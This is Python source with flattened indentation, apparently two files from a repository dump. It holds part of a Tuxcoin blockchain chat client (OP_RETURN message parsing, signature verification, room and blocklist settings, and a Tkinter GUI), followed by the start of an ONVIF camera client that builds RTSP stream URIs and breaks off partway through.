if 'OP_RETURN' in i['scriptPubKey']['asm']:
#print('message bitches')
msg = i['scriptPubKey']['hex']
msgBytes = bytes.fromhex(msg[8:])
try:
try:
msgString = msgBytes.decode("UTF-8")
except:
try:
msgBytes = bytes.fromhex(msg[10:])
msgString = msgBytes.decode("UTF-8")
except:
msgBytes = bytes.fromhex(msg[12:])
msgString = msgBytes.decode("UTF-8")
msgString = json.loads(msgString)
if msgString['addr'] in getBlocked()['blackList']:
continue
verify = rpcproxy2.verifymessage(msgString['addr'], msgString['sig'], msgString['message'] + str(msgString['time']) + str(msgString['rm']))
if msgString['rm'] == settings()['room'].strip() and verify == True:
msgString['txid'] = txid
message.append(msgString)
print(msgString)
if verify == True:
print("Signature Verified")
else:
print("Signature not verified")
except:
continue
#print(msgBytes)
mempool = rpcproxy2.getrawmempool()
for txid in mempool:
if txid in seenTX:
continue
tx = rpcproxy2.getrawtransaction(txid, True)
for i in tx['vout']:
if 'OP_RETURN' in i['scriptPubKey']['asm']:
#print('message bitches')
msg = i['scriptPubKey']['hex']
msgBytes = bytes.fromhex(msg[8:])
try:
try:
msgString = msgBytes.decode("UTF-8")
except:
try:
msgBytes = bytes.fromhex(msg[10:])
msgString = msgBytes.decode("UTF-8")
except:
msgBytes = bytes.fromhex(msg[12:])
msgString = msgBytes.decode("UTF-8")
msgString = json.loads(msgString)
if msgString['addr'] in getBlocked()['blackList']:
continue
verify = rpcproxy2.verifymessage(msgString['addr'], msgString['sig'], msgString['message'] + str(msgString['time']) + str(msgString['rm']))
if msgString['rm'] == settings()['room'].strip() and verify == True:
msgString['txid'] = txid
message.append(msgString)
print(msgString)
if verify == True:
print("Signature Verified")
else:
print("Signature not verified")
except:
continue
#print(msgBytes)
seenTX.append(txid)
bestBlock = currentHeight
    return sorted(message, key=lambda d: d['time'])
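# ---------------------------------------------------------------------------
# Sketch of the chat payload that getMessages() expects inside an OP_RETURN
# output (inferred from the parsing code above, not an authoritative protocol
# description). The JSON is hex-encoded after the OP_RETURN opcode and push
# bytes, which is why decoding is retried at offsets 8, 10 and 12. Field
# values here are placeholders.
#
# example_payload = {
#     "addr": "<signing address>",   # must verify against sig below
#     "sig": "<base64 signature over message + time + rm>",
#     "message": "hello tuxchat",
#     "time": 1660000000,
#     "rm": "general",               # room name, compared to settings()['room']
# }
# ---------------------------------------------------------------------------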
def subEmotes(msg):
msg = emoji.emojize(msg, use_aliases=True)
emote = emoteList
if settings()['subEmotes'] == True:
for i in emote:
if i in msg:
msg = msg.replace(i, emote[i])
return msg
def subName(addr, info=False):
if addr in getNames():
if getNames()[addr]['name'] == "":
return addr
elif addr in getBlocked()['hideName'] and info == False:
return addr
else:
return getNames()[addr]['name']
else:
return addr
def subColor(addr):
if addr in getNames():
return getNames()[addr]['color']
else:
return 'white'
class GUI:
# constructor method
def __init__(self):
self.focus = focus
self.lastMsg = 0
with open('settings.json') as f:
settings = json.loads(f.read())
self.settings = settings
if self.settings['mute'] == False:
mixer.init()
ps = mixer.Sound('pop-alert.ogg')
self.ps = ps
self.json = json
self.rpcproxy = rpcproxy
self.masterMsg = []
# chat window which is currently hidden
self.Window = Tk()
self.Window.withdraw()
if self.settings['enterToSend'] == True:
self.Window.bind("<Return>", self.enterbtn)
self.Window.bind("<Shift-Return>", self.shiftenterbtn)
self.Window.bind("<FocusIn>", self.focusIn)
self.Window.bind("<FocusOut>", self.focusOut)
self.Window.bind("<Button-3>", self.rightClick)
self.Window.bind("<Button-1>", self.leftClick)
self.Window.protocol("WM_DELETE_WINDOW", self.onClose)
self.goAhead(subName(self.settings['signingAddress']))
if os.name == 'nt':
self.Window.iconbitmap('tuxchat-logo.ico')
else:
self.Window.call('wm', 'iconphoto', self.Window._w, PhotoImage(file='tuxchat-logo.png'))
self.Window.mainloop()
def goAhead(self, name):
self.layout(name)
# the thread to receive messages
rcv = threading.Thread(target=self.receive)
rcv.start()
# The main layout of the chat
def layout(self,name):
self.name = name
if len(name) > 24:
dots = '...'
else:
dots = ''
# to show chat window
self.Window.deiconify()
self.Window.title(f"Tuxcoin blockchain messaging interface | {version}")
self.Window.resizable(width = False,
height = False)
self.Window.configure(
bg = "#17202A")
self.labelHead = Label(self.Window,
bg = "#17202A",
fg = "#EAECEE",
text = f"{self.name[0:24]}{dots} | {self.settings['room'].strip()}",
font = ("Noto", 13, "bold"),
pady = 5)
self.labelHead.pack(side=TOP)
self.textCons = ScrolledText(self.Window,
bg = "#17202A",
fg = "#EAECEE",
font = ("Noto", 14),
width=50,
padx = 5,
pady = 5,
wrap=WORD)
self.textCons.pack(fill=BOTH, side=TOP, padx=5, pady=5, anchor="w")
self.entryMsg = ScrolledText(self.Window,
width=50,
height=4,
padx=5,
pady=5,
bg = "#2C3E50",
fg = "#EAECEE",
font = ("Noto", 13),
wrap=WORD)
# place the given widget
# into the gui window
self.entryMsg.pack(side=LEFT, anchor="w", padx=5, pady=5)
self.entryMsg.focus()
# create a Send Button
self.buttonMsg = Button(self.Window,
text = "Send",
font = ("Noto", 10, "bold"),
bg = "#17202A",
fg = "#EAECEE",
width=11,
height=1,
bd=0,
command = lambda : self.sendButton(re.sub(r'[\r\n][\r\n]{2,}', '\n\n', self.entryMsg.get(1.0, "end-1c"))))
self.buttonMsg.pack(side=BOTTOM, anchor="w", pady=5)
self.buttonSetting = Button(self.Window,
text = "Settings",
font = ("Noto", 10, "bold"),
width = 10,
height=1,
bg = "#17202A",
fg = "#EAECEE",
bd=0,
command = self.settingsBtn)
self.buttonSetting.pack(side=BOTTOM, anchor="w", pady=5, ipadx=3)
ToolTip(widget = self.buttonSetting, text = "Change tuxchat settings, including screen name, here.")
self.labelFoot = Label(self.Window,
bg = "#17202A",
fg = "#EAECEE",
text = f"Balance: {rpcproxy().getbalance():,}")
self.labelFoot.pack(side=BOTTOM, anchor="w", padx=5)
self.textCons.config(cursor = "arrow")
self.textCons.config(state = DISABLED)
self.rcMenu = Menu(self.Window, tearoff=0)
self.rcMenu.add_command(label ="Cut", command=self.cut)
self.rcMenu.add_command(label ="Copy", command=self.copy)
self.rcMenu.add_command(label ="Paste", command=self.paste)
def updateName(self):
if self.name != subName(settings()['signingAddress']):
self.name = subName(settings()['signingAddress'])
if len(self.name) > 24:
dots = '...'
else:
dots = ''
self.labelHead['text'] = f"{self.name[0:24]}{dots} | {settings()['room'].strip()}"
def updateBalance(self):
tnow = datetime.now()
if tnow.second % 10 == 0:
self.labelFoot['text'] = f"Balance: {rpcproxy().getbalance():,}"
def rightClick(self, event):
try:
self.rcMenu.tk_popup(event.x_root, event.y_root)
finally:
self.rcMenu.grab_release()
def leftClick(self, event):
try:
self.rcMenu.unpost()
except:
pass
def settingsBtn(self):
self.buttonSetting.config(state='disabled')
self.popup = Tk()
self.popup.wm_title("Tuxchat Settings")
self.addrLabel = Label(self.popup, text="Signing Address: ", font=("Noto", 10, "bold"))
self.addrLabel.grid(row=1, column=1, pady=10)
self.addrEntry = Entry(self.popup, width=36)
self.addrEntry.grid(row=1, column=2)
self.addrEntry.insert(END, settings()['signingAddress'])
self.addrBtn = Button(self.popup, text='Submit', command = lambda : self.setAddr(self.addrEntry.get()))
self.addrBtn.grid(row=1, column=5)
self.nameLabel = Label(self.popup, text="Screen Name: ", font=("Noto", 10, "bold"))
self.nameLabel.grid(row=2, column=1, pady=10)
self.nameEntry = Entry(self.popup, width=36)
self.nameEntry.grid(row=2, column=2)
self.nameEntry.insert(END, self.name)
colorChoice = settings()['colors']
selectedChoice = StringVar()
self.colorCombo = ttk.Combobox(self.popup, textvariable=selectedChoice, width=10)
self.colorCombo['values'] = colorChoice
self.colorCombo.current(colorChoice.index(subColor(settings()['signingAddress'])))
self.colorCombo.grid(row=2, column=4, sticky="W")
self.colorLabel = Label(self.popup, text="Color:", font=("Noto", 10, "bold"))
self.colorLabel.grid(row=2, column=3, sticky='W')
self.nameBtn = Button(self.popup, text='Submit', command = lambda : self.setName(self.nameEntry.get(), self.colorCombo.get()))
self.nameBtn.grid(row=2, column=5)
self.roomLabel = Label(self.popup, text="Room: ", font=("Noto", 10, "bold"))
self.roomLabel.grid(row=3, column=1, pady=10)
roomChoice = settings()['roomHistory']
selectedRoomChoice = StringVar()
self.roomCombo = ttk.Combobox(self.popup, textvariable=selectedRoomChoice)
self.roomCombo['values'] = roomChoice[::-1]
self.roomCombo.current(0)
self.roomCombo.grid(row=3, column=2, sticky="W")
self.roomBtn = Button(self.popup, text='Refresh/Submit', command = lambda : self.newRoom(self.roomCombo.get()))
self.roomBtn.grid(row=3, column=5)
self.blLabel = Label(self.popup, text="Blacklist: ", font=("Noto", 10, "bold"))
self.blLabel.grid(row=4, column=1, pady=10)
blChoice = getBlocked()['blackList']
selectedRoomChoice = StringVar()
self.blCombo = ttk.Combobox(self.popup, textvariable=selectedRoomChoice, width=36)
self.blCombo['values'] = blChoice
self.blCombo.grid(row=4, column=2, sticky="W")
self.blBtn = Button(self.popup, text='Submit', command = lambda : self.rmBlackList(self.blCombo.get()))
self.blBtn.grid(row=4, column=5)
self.settingsDisable()
self.B1 = ttk.Button(self.popup, text="Close", command = self.killPopup)
self.B1.grid(row=5, column=2)
self.B2 = ttk.Button(self.popup, text="Edit", command = self.settingsEdit)
self.B2.grid(row=5, column=3)
ToolTip(widget = self.addrLabel, text = "Address used to sign messages with.\nLeave blank to generate new random address.")
ToolTip(widget = self.nameLabel, text = "Your screen name.")
ToolTip(widget = self.colorLabel, text = "The color of your screen name.")
ToolTip(widget = self.roomLabel, text = "The current room that you are in. To change it, either make a selection from the dropdown or type in the name of a room.")
ToolTip(widget = self.blLabel, text = "The current blacklist. Addresses can be removed from the list through this.")
self.popup.protocol("WM_DELETE_WINDOW", self.killPopup)
self.popup.mainloop()
def newRoom(self, room):
room = room.strip()
with open('settings.json', 'r+') as f:
data = json.load(f)
data['room'] = room
# Move the room to the end of the history (or add it if it is new)
if room in data['roomHistory']:
data['roomHistory'].remove(room)
data['roomHistory'].append(room)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
self.textCons.config(state = NORMAL)
self.textCons.delete(1.0, END)
self.textCons.config(state = DISABLED)
setBlock()
self.masterMsg = []
if len(self.name) > 24:
dots = '...'
else:
dots = ''
self.labelHead['text'] = f"{self.name[0:24]}{dots} | {settings()['room'].strip()}"
self.killPopup()
def settingsDisable(self):
self.addrEntry.config(state='readonly')
self.addrBtn.config(state='disabled')
self.nameEntry.config(state='readonly')
self.colorCombo.config(state='disabled')
self.nameBtn.config(state='disabled')
self.blCombo.config(state='disabled')
self.blBtn.config(state='disabled')
def settingsEdit(self):
confirm = messagebox.askyesno("Confirmation", "Are you sure you want to edit settings?")
if confirm:
self.B2.config(state='disabled')
self.addrEntry.config(state='normal')
self.addrBtn.config(state='normal')
self.nameEntry.config(state='normal')
self.colorCombo.config(state='readonly')
self.nameBtn.config(state='normal')
self.blCombo.config(state='readonly')
self.blBtn.config(state='normal')
self.popup.lift()
else:
self.popup.lift()
def killPopup(self):
self.buttonSetting.config(state='normal')
self.popup.destroy()
def setName(self, name, color):
if color == "":
messagebox.showwarning("Warning", f"Please select a color")
return
name = ''.join(name.split())
if len(name) > 30:
messagebox.showwarning("Warning -Name too long", f"Name too long.\nPlease choose a name that is 30 characters or less.")
return
elif name == subName(settings()['signingAddress']) and color == subColor(settings()['signingAddress']):
return
elif name.upper() in getNames()['nameList'] and name.upper() != subName(settings()['signingAddress']).upper():
messagebox.showwarning("Warning -Name already in use", f"Name already in use, please choose a different name.")
return
else:
verify = messagebox.askyesno("Confirmation", f"Are you sure you want to use the name: {name} with the color: {color}?")
if verify:
signature = {}
timestamp = int(time.time())
addr = settings()['signingAddress']
sig = rpcproxy().signmessage(addr, name + str(timestamp))
signature['addr'] = addr
signature['sig'] = sig
message = {'message': name, 'sig': signature['sig'], 'addr': signature['addr'], "nameRequest": color, "time": timestamp}
try:
req = rpcproxy().sendmessage(json.dumps(message))
messagebox.showinfo("Information", f"Name request successfully submitted.\nName request must be included in a block to take affect.\nTXID: {req}")
self.killPopup()
except Exception as e:
print(e)
print("Name request successfully submitted. Please allow a few minutes for name change to take affect.")
def setAddr(self, addr):
if addr == '':
addr = rpcproxy().getnewaddress("", "legacy")
if validateAddress(addr)[0] == False:
messagebox.showwarning("Warning", f"{validateAddress(addr)[1]}")
elif addr == settings()['signingAddress']:
return
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to use the address: {addr}")
if confirm:
with open('settings.json', 'r+') as f:
data = json.load(f)
data['signingAddress'] = addr
f.seek(0)
json.dump(data, f, indent = 4)
self.addrEntry.delete(0, END)
self.addrEntry.insert(END, settings()['signingAddress'])
messagebox.showinfo("INFO", f"Address successfully updated.")
self.killPopup()
# function to basically start the thread for sending messages
def sendButton(self, msg):
self.msg = msg
if validateAddress(settings()['signingAddress'])[0] == False or settings()['signingAddress'] == '':
messagebox.showerror("ERROR", f"Valid signing address not found!\nPlease add a valid signing address in settings!")
return
if self.checkBytes(self.msg) == False:
return
if rpcproxy().getbalance() < 1:
messagebox.showerror("ERROR", f"Low Balance!")
return
self.textCons.config(state = DISABLED)
self.entryMsg.delete(1.0, END)
snd= threading.Thread(target = self.sendMessage)
snd.start()
self.buttonMsg.config(state='disabled')
self.buttonMsg.after(1000, lambda: self.buttonMsg.config(state='normal'))
def checkBytes(self, msg):
msgLen = len(msg.strip().encode('raw_unicode_escape'))
roomLen = len(settings()['room'].strip().encode('raw_unicode_escape'))
metaLen = roomLen + 190
maxLen = 1010 - metaLen
totalLen = msgLen + metaLen
#print(msgLen)
#print(totalLen)
if totalLen > 1010:
messagebox.showwarning("Warning", f"Message exceeds maximum possible Bytes.\nMax Possible: {maxLen}\nYour message: {msgLen}")
return False
else:
return True
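# Worked example of the byte budget above (a sketch; the 190-byte metadata overhead
# and the 1010-byte ceiling are taken from checkBytes itself, not from a protocol spec):
# room "general" -> roomLen = 7, metaLen = 7 + 190 = 197,
# maxLen = 1010 - 197 = 813, so any message longer than 813 bytes is rejected.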
def getInfo(self, event):
thing = self.textCons.index(f"@{event.x},{event.y}"), self.textCons.index("current")
#print(thing)
thing = thing[0]
for i in reversed(self.masterMsg):
if i['index'] == int(float(thing)):
self.popinfo = Tk()
self.popinfo.wm_title("Message Info")
label = Text(self.popinfo)
label.grid(row=1, column=1, columnspan=10, rowspan=10, pady=10)
label.insert(END, f"Sender: {i['addr']}\nScreen name: {subName(i['addr'], True)}\nRoom: {i['rm']}\nSignature: {i['sig']}\nTXID: {i['txid']}\nTimestamp: {i['time']}\nMessage Time: {datetime.fromtimestamp(i['time'])}\nMessage:\n{i['message']}")
label.config(state = DISABLED)
if i['addr'] in getBlocked()['blockList']:
B2text = "Unblock"
else:
B2text = "Block"
if i['addr'] in getBlocked()['hideName']:
B4text = "Unhide Name"
else:
B4text = "Hide Name"
B1 = ttk.Button(self.popinfo, text="Close", command = self.popinfo.destroy)
B1.grid(row=11, column=3)
B2 = ttk.Button(self.popinfo, text=B2text, command = lambda : self.addBlock(i['addr']))
B2.grid(row=11, column=4)
B3 = ttk.Button(self.popinfo, text="Blacklist", command = lambda : self.addBlackList(i['addr']))
B3.grid(row=11, column=5)
B4 = ttk.Button(self.popinfo, text=B4text, command = lambda : self.addHideName(i['addr']))
B4.grid(row=11, column=6)
self.popinfo.mainloop()
break
return "break"
def addHideName(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['hideName']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want unhide the following name From user\n{addr}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['hideName'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully unhidden name.")
self.popinfo.destroy()
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want hide the following name\n{subName(addr)}\nFrom user\n{addr}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['hideName'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully hidden name.")
self.popinfo.destroy()
def rmBlackList(self, addr):
if addr in getBlocked()['blackList']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to remove\nADDR: {addr}\nScreen Name: {subName(addr)}\n from the black list?")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blackList'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully removed\n{addr}\nfrom black list.")
self.killPopup()
def addBlackList(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['blackList']:
return
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to add\nADDR: {addr}\nScreen Name: {subName(addr)}\n to the black list?")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blackList'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully added\n{addr}\nto black list.")
self.popinfo.destroy()
def addBlock(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['blockList']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to unblock\nADDR: {addr}\nScreen Name: {subName(addr)}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blockList'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully removed\n{addr}\nfrom the block list.")
self.popinfo.destroy()
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to block\nADDR: {addr}\nScreen Name: {subName(addr)}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blockList'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully added\n{addr}\nto block list.")
self.popinfo.destroy()
# function to receive messages
def receive(self):
self.textCons.tag_add("gray", END)
self.textCons.tag_config("gray", foreground="gray", font=("Noto", 9))
self.textCons.tag_add("red", END)
self.textCons.tag_bind("red", "<Button-1>", self.getInfo)
self.textCons.tag_bind("red", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("red", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("red", foreground="red")
self.textCons.tag_add("green", END)
self.textCons.tag_bind("green", "<Button-1>", self.getInfo)
self.textCons.tag_bind("green", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("green", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("green", foreground="green")
self.textCons.tag_add("blue", END)
self.textCons.tag_bind("blue", "<Button-1>", self.getInfo)
self.textCons.tag_bind("blue", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("blue", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("blue", foreground="blue")
self.textCons.tag_add("yellow", END)
self.textCons.tag_bind("yellow", "<Button-1>", self.getInfo)
self.textCons.tag_bind("yellow", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("yellow", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("yellow", foreground="yellow")
self.textCons.tag_add("cyan", END)
self.textCons.tag_bind("cyan", "<Button-1>", self.getInfo)
self.textCons.tag_bind("cyan", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("cyan", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("cyan", foreground="cyan")
self.textCons.tag_add("pink", END)
self.textCons.tag_bind("pink", "<Button-1>", self.getInfo)
self.textCons.tag_bind("pink", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("pink", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("pink", foreground="pink")
self.textCons.tag_add("purple", END)
self.textCons.tag_bind("purple", "<Button-1>", self.getInfo)
self.textCons.tag_bind("purple", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("purple", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("purple", foreground="purple")
self.textCons.tag_add("magenta", END)
self.textCons.tag_bind("magenta", "<Button-1>", self.getInfo)
self.textCons.tag_bind("magenta", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("magenta", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("magenta", foreground="magenta")
self.textCons.tag_add("black", END)
self.textCons.tag_bind("black", "<Button-1>", self.getInfo)
self.textCons.tag_bind("black", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("black", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("black", foreground="black")
self.textCons.tag_add("white", END)
self.textCons.tag_bind("white", "<Button-1>", self.getInfo)
self.textCons.tag_bind("white", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("white", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("white", foreground="white")
while True:
try:
message = getMessages()
self.updateName()
self.updateBalance()
for i in message:
# insert messages to text box
uname = subName(i['addr']) #i.split(':')[0]
i['index'] = self.getRow()
if i['addr'] in getBlocked()['blockList']:
message = "<BLOCKED>"
else:
message = subEmotes(i['message'])
self.textCons.config(state = NORMAL)
self.textCons.insert(END, f"{uname}: ", subColor(i['addr']))
self.textCons.insert(END, f"{datetime.fromtimestamp(i['time'])}\n", "gray")
self.textCons.insert(END,
f"{message}\n\n")
self.textCons.config(state = DISABLED)
self.textCons.see(END)
if settings()['mute'] == False and self.focus == False:
self.ps.play()
self.masterMsg.append(i)
except Exception as e:
# an error will be printed on the command line or console if there's an error
print("An error occured!")
print(e)
break
time.sleep(0.1)
def getRow(self):
index = self.textCons.index("end-1c")
row = int(float(index)) #index.split(".")[0]
return row
def onClose(self):
self.Window.destroy()
os._exit(0)
def enterbtn(self, msg):
self.entryMsg.delete("insert-1c")
self.buttonMsg.invoke()
def shiftenterbtn(self, msg):
self.entryMsg.insert(END, "")
def focusIn(self, focus):
self.focus = True
def focusOut(self, focus):
self.focus = False
def paste(self):
self.entryMsg.insert(END, pyperclip.paste())
def copy(self):
pyperclip.copy(self.entryMsg.selection_get())
self.textCons.tag_remove(SEL, "1.0", END)
def cut(self):
pyperclip.copy(self.entryMsg.selection_get())
try:
self.entryMsg.delete("sel.first", "sel.last")
except:
self.textCons.tag_remove(SEL, "1.0", END)
def signMessage(self, msg, time, room):
signature = {}
self.signature = signature
self.msg = msg
addr = settings()['signingAddress']
sig = rpcproxy().signmessage(addr, self.msg + str(time) + str(room))
self.signature['addr'] = addr
self.signature['sig'] = sig
return self.signature
# function to send messages
def sendMessage(self):
self.textCons.config(state=DISABLED)
timestamp = int(time.time())
sig = self.signMessage(self.msg.strip(), timestamp, settings()['room'].strip())
while True:
if self.msg.strip() == '':
print("Blank message not allowed.")
break
message = {'message': self.msg.strip(), 'sig': sig['sig'], 'addr': sig['addr'], "rm": settings()['room'].strip(), "time": timestamp}
self.message = message
try:
rpcproxy().sendmessage(json.dumps(message))
except Exception as e:
print(e)
self.lastMsg = timestamp
break
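# A minimal sketch of how a receiver could check a message signature, assuming the
# Tuxcoin wallet exposes the standard Bitcoin-style `verifymessage` RPC (that RPC is
# not used elsewhere in this file, so treat it as an assumption):
# msg = json.loads(raw_payload) # hypothetical decoded on-chain payload
# ok = rpcproxy().verifymessage(msg['addr'], msg['sig'], msg['message'] + str(msg['time']) + str(msg['rm']))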
def setBlock():
global bestBlock
global seenTX
seenTX = []
currentHeight = rpcproxy().getblockcount()
bestBlock = currentHeight - settings()['history']
def checkSetup():
system_type = platform.system()
if system_type == 'Linux':
settingsFile = os.path.expanduser('~/.config/tuxchat/settings.json')
if os.path.isfile(settingsFile) == False:
pass
#print('lol')
elif system_type == 'Windows':
settingsFile = os.path.expanduser('~\\AppData\\Roaming\\tuxchat\\tuxchat\\settings.json')
def checkConnection():
print('Checking connection to Tuxcoin wallet...')
try:
ver = rpcproxy().getnetworkinfo()['subversion']
print('Connection successful!')
except:
print('No connection to Tuxcoin wallet')
input("Press Enter to close")
sys.exit()
print('Checking for compatible wallet version...')
if int(''.join(filter(str.isdigit, ver))) < 182:
print(f'Tuxcoin wallet version too low.\nHas: {ver}\nRequired: TuxcoinCore:0.18.2 or higher.')
input("Press Enter to close")
sys.exit()
else:
print(f'Wallet version is: {ver}\nCompatible wallet detected!')
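# Worked example of the version check above: a subversion string such as
# "/TuxcoinCore:0.18.2/" filtered down to its digits becomes "0182", i.e. int 182,
# which is then compared against the minimum supported value of 182.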
def checkPeers():
print('Checking for compatible peers on the Tuxcoin network...')
peers = rpcproxy().getpeerinfo()
for i in peers:
ver = int(''.join(filter(str.isdigit, i['subver'])))
if ver < 182:
continue
print("Compatible peer found!")
return
print('No compatible peers found')
input("Press Enter to close")
sys.exit()
def validateAddress(addr):
val = rpcproxy().validateaddress(addr)
if val['isvalid'] == True and val['ismine'] == True and val['isscript'] == False and val['iswitness'] == False:
print('Address validated!')
msg = 'Address validated!'
return (True, msg)
else:
if val['isvalid'] == False:
print('Not a valid Tuxcoin address!')
msg = 'Not a valid Tuxcoin address!'
return (False, msg)
elif val['ismine'] == False:
print("Address not owned by wallet!")
msg = "Address not owned by wallet!"
return (False, msg)
elif val['isscript'] == True or val['iswitness'] == True:
print("Invalid address type!\nAddress must be Legacy, not segwit/bech32")
msg = "Invalid address type!\nAddress must be Legacy, not segwit/bech32"
return (False, msg)
def startNames():
while True:
names.main()
time.sleep(10)
def main():
print(f"Welcome to tuxchat version: {version}")
checkSetup()
checkConnection()
checkPeers()
setBlock()
print('Refreshing screen name database. This may take several minutes.')
print('Building database...')
names.main()
gnm = threading.Thread(target=startNames)
gnm.start()
main()
# create a GUI class object
g = GUI()
|
demo.py
|
# -*- coding: utf-8 -*-
import datetime
from onvif2 import ONVIFCamera
from zeep.transports import Transport
import json
import os
import sys
def getexepath():
"""
返回可执行程序的当前路径。 sys.argv 中保存了可执行程序的全路径
:return:
"""
return os.path.split(os.path.realpath(sys.argv[0]))[0]
class COnvifClient:
def __init__(self):
self.mycam = None
self.media_service = None
self.media2_service = None
self.events_service = None
self.name = None
self.pwd = None
def __del__(self):
pass
def conn(self, ip, port, name, pwd) -> bool:
"""
通过鉴权对设备进行连接.
media\media2 默认加载,其他模块按需加载
:param ip:
:param port:
:param name:
:param pwd:
:return:
"""
try:
# Set the SOAP operation timeout
transport = Transport(operation_timeout=10)
# Set the wsdl directory; the wsdl folder must be copied next to the executable
self.mycam = ONVIFCamera(ip, port, name, pwd, wsdl_dir=getexepath() + '/wsdl',
transport=transport)
except Exception as e:
print('error: {}'.format(e))
return False
finally:
pass
self.name = name
self.pwd = pwd
return self.getmedia()
# ---------------------------------- media \ media2 -------------------------------------------
def getmedia(self):
"""
获取media: 分为media2、media,其中media2支持h265,media只支持h264
:return:
# 先使用media2,再使用media: media2支持h265
# 比如海康、大华、宇视都支持media2, 淼盾只支持media
"""
try:
self.media2_service = self.mycam.create_media2_service()
except Exception as e:
print('error: {}'.format(e))
finally:
pass
# Fall back to the media service (H.264 only)
if self.media2_service is None:
try:
self.media_service = self.mycam.create_media_service()
except Exception as e:
print('error: {}'.format(e))
return False
finally:
pass
return True
def _getstreamuri_media(self) -> list:
"""
通过media 获取rtsp地址
:return:
"""
profiles = self.media_service.GetProfiles()
urilist = []
for profile in profiles:
o = self.media_service.create_type('GetStreamUri')
o.ProfileToken = profile.token
o.StreamSetup = {'Stream': 'RTP-Unicast', 'Transport': {'Protocol': 'RTSP'}}
r = self.media_service.GetStreamUri(o)
# Embed the credentials in the URI (the leading 'rtsp://' is stripped via [7:])
if self.pwd != '':
dic = {'token': profile.token,
'rtsp': "rtsp://{}:{}@{}".format(self.name, self.pwd, r['Uri'][7:])}
else:
dic = {'token': profile.token,
'rtsp': r['Uri']}
urilist.append(dic)
return urilist
def _getvideo_media(self) -> list:
"""
通过media获取视频参数
:return:
"""
configurations = self.media_service.GetVideoEncoderConfigurations()
lns = []
for configuration in configurations:
if configuration['Encoding'].lower() == 'h264':
width = configuration['Resolution']['Width']
height = configuration['Resolution']['Height']
dic = {'token': configuration['token'],
'encoding': configuration['Encoding'],
'ratio': "{}*{}".format(width, height),
'fps': configuration['RateControl']['FrameRateLimit'],
'bitrate': configuration['RateControl']['BitrateLimit'],
'gop': configuration['H264']['GovLength'],
'profile': configuration['H264']['H264Profile'],
'quality': configuration['Quality']}
else:
dic = {'token': configuration['Name'], 'encoding': configuration['Encoding']}
lns.append(dic)
return lns
def _getstreamuri_media2(self) -> list:
"""通过media2.0 版本获取rtsp地址"""
profiles = self.media2_service.GetProfiles()
urilist = []
for profile in profiles:
o = self.media2_service.create_type('GetStreamUri')
o.ProfileToken = profile.token
o.Protocol = 'RTSP'
uri = self.media2_service.GetStreamUri(o)
# Embed the credentials in the URI (the leading 'rtsp://' is stripped via [7:])
if self.pwd != '':
dic = {'token': profile.token,
'rtsp': "rtsp://{}:{}@{}".format(self.name, self.pwd, uri[7:])}
else:
dic = {'token': profile.token,
'rtsp': uri}
urilist.append(dic)
return urilist
def _getvideo_media2(self) -> list:
"""通过media2获取编码配置,media2支持h265"""
configurations = self.media2_service.GetVideoEncoderConfigurations()
lns = []
for configuration in configurations:
if configuration['Encoding'].lower() == 'h264' or configuration['Encoding'].lower() == 'h265':
width = configuration['Resolution']['Width']
height = configuration['Resolution']['Height']
dic = {'token': configuration['token'],
'encoding': configuration['Encoding'],
'ratio': "{}*{}".format(width, height),
'fps': configuration['RateControl']['FrameRateLimit'],
'bitrate': configuration['RateControl']['BitrateLimit'],
'gop': configuration['GovLength'],
